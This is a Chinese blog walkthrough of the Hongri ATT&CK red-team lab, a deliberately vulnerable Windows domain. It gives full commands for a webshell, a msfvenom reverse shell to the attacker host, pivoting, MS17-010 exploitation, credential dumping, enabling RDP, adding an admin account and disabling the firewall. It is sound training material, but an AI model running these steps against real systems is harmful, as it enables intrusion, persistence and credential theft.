freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[红日靶场]ATT&CK实战系列——红队实战(—)
  • 关注
[红日靶场]ATT&CK实战系列——红队实战(—)
2021-10-16 03:13:33

环境搭建

靶场地址
该靶场给了三台虚拟机
下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019
靶场环境是这样的image.pngweb服务器由win7来作,网络可以按照官方给的配置
我是按自己习惯改的,我把win7设置成nat,另一个网络设成vm1在这里插入图片描述另外两个虚拟机的网络适配器都设置成vm1

NAT的子网是192.168.159.0/24在这里插入图片描述在win7里面的phpstudy打开服务image.png成功访问
image.png以上就已经搭建好了环境了

WEB服务渗透

namp扫描端口,开放80和3306image.png扫一下目录,有phpinfo和phpmyadminimage.png可以看到版本为3.5.8.2
在这里插入图片描述先试试弱口令不行再去找找有没有poc打
果然,root:root进入了后台
可以看到这里是有一个cms的,是yxcms
在这里插入图片描述试了一下,果然有image.png数据库里面找到这个在这里插入图片描述默认密码登陆进去了
可以直接修改模板文件,都是php文件
image.png直接写一句话木马在这里插入图片描述成功执行命令
image.png上蚁剑image.png看下权限,好家伙,直接是admin在这里插入图片描述

上线cs

不知道为啥powershell的方式打不上去,只能搞个exe用蚁剑传上去执行
image.png用cs提权一下,成功了,那么这台机子打穿了,我们进行横向移动在这里插入图片描述

上线msf

用kali执行(kali的ip为192.168.159.131)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.131 LPORT=4444 -f exe > shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.159.131
set lport 4444
exploit

内网信息收集

msf中getsystem也可直接提权

提取密码哈希
image.png

也可以直接用mimikatz模块提取密码

ipconfig找到这个机子的内网地址
image.pngarp -a简单探测一下内网主机信息image.png192.168.52.138和141可能会是第二台主机的ip

cs方面可以这样做
先配置静态路由

run autoroute -s 192.168.52.0/24

然后运行这个模块去爆破c段
image.png成功发现138、141和143,而143是本机的,那么另外两台就是141和138了

横向移动

隧道搭建

先将该web服务器配置为代理服务器当作跳板机
这里用cs上线
image.png
自己设定一个端口,然后去代理工具添加一个socks服务器就可以了

cs方面就用刚刚配置的静态路由即可
但是cs这个代理我用着很不稳,所以我还是选择了msf的隧道搭建

run post/multi/manage/autoroute
background
use auxiliary/server/socks_proxy
set version 4a
run

再修改/etc/proxychains.conf文件
在这里插入图片描述

漏洞探测

刚刚收集到剩下两个机子的内网ip为138和141
先扫描一下端口
use auxiliary/scanner/portscan/tcp
我这里优先扫80 445(MS17-010) 3389(MS19-0708)
可以看到这里两个ip都开了445端口,那么我们就试试MS17-010
image.png

这里使用ms17-010
use auxiliary/scanner/smb/smb_ms17_010去检测一下
可以看到是存在ms17-010漏洞滴
在这里插入图片描述

拿下内网主机

执行一下命令

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run

成功执行!
image.png想直接用ms17_010_eternalblue弹一个shell过来,但是失败了image.png后面百度发现由于域控主机是不出网的,要攻击机去主动连接域控服务器才行
set这个payload

set payload windows/x64/meterpreter/bind_tcp

但是我还是没能复现成功。。。

但是这里尝试psexec成功了image.pngimage.png我这里本来选择联动cs,但是这个太脆弱了,我一打session就掉。。。无奈还是放弃

最后我就直接用ms17_010_command来打
这里有两个坑:

  • 第一个是msf的payload会把反斜杠和双引号给转义掉,所以我们payload要这样写

  • 第二个坑是添加用户的密码必须满足要求:字母符号加数字,不然无法添加

开启3389
set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

添加用户
net user aaaa aaa@123456 /add
添加到管理员
net localgroup administrators aaaa /add

直接登陆远控

proxychains rdesktop 192.168.52.141

image.png同理再拿下域管主机
注意!域管主机连不上的话需要关闭防火墙!!!

netsh advfirewall set allprofiles state off

image.png

这里还有一个攻击手段,那就是用cs的smb打
win7机上线cs后,提权再使用net view去内网扫描
利用smb去上线剩下的内网机器
image.png成功上线其他的两台
在这里插入图片描述image.png

最后攻击的拓扑图如下
image.png

# 黑客 # web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
上线cs
    上线msf
      内网信息收集
        隧道搭建
          漏洞探测
            拿下内网主机